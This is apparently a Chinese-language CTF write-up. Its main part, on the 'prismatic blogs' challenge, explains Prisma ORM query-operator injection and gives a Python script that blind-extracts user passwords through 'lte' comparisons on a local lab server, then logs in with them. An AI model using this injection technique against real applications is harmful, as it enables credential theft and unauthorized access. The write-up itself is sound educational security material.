S1rius AI正在绞尽脑汁想思路ING···
S1riusのAI摘要
DeepSeek-chat

web

Scavenger

虽然是签到题,但还是挺麻烦的

1

image-20251031150618998

2

image-20251031150834426

5

image-20251031151422153

7

image-20251031151520445

image-20251031151541274

4

image-20251031151626112

6

image-20251031151708987

3

image-20251031151746577

prismatic blogs

首先看到posts的请求设置了published为true

同时查看seed.js,发现flag确实在published为false的文章里面

丢给ai
ai说post那个地方可以用

1
2
3
4
5
6
7
8
9
10
{
  where: {
    OR: [
      {
        published: "true"
      }
    ],
    published: true
  }
}

这样的结构绕过published=true

但实际不行

调试报错
image-20251031193138956

提示类型不符报错

由于会被认定为string所以说只能从string的变量入手

只有tittle body和authorid指向的name和password

那只能进行类似sql注入的办法,从name和password入手了

问了下ai,他给出的可能能用到的有gt lt等,看起来有点像mongodb

并且

Prisma 的 where 条件中,所有顶层字段默认是 AND 关系

所以无法在published同层使用OR,和他同层的默认是and,所以and or都只能在下一层才有用

尝试用过lte即<=来进行盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests

users = ["White", "Bob", "Tommy", "Sam"]
up = {}
dict = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
passwd = ""
for user in users:
    for i in range(32):
        for j in range(len(dict)):
            res = requests.get(
                f"http://localhost:32771/api/posts?author[name]={user}&author[password][lte]={passwd+dict[j]}"
            ).json()
            if len(res["posts"]) > 0:
                passwd += dict[j - 1]
                print(passwd)
                break

    up[user] = passwd[:-1] + dict[dict.index(passwd[-1]) + 1]
    passwd = ""

print(up)
# {'White': '3pCtWJfabwPlo6qNgGS1P4', 'Bob': '8AXCgMish5Zn59rSXjM', 'Tommy': 'OZuSyfPSxlwZuipoyWETQ9', 'Sam': 'AIIr7DxG3EarBQu'}

for user, password in up.items():
    res = requests.post('http://localhost:32771/api/login', json={"name":user, "password":password}).text
    if "Flag" in res:
        print(res)
        break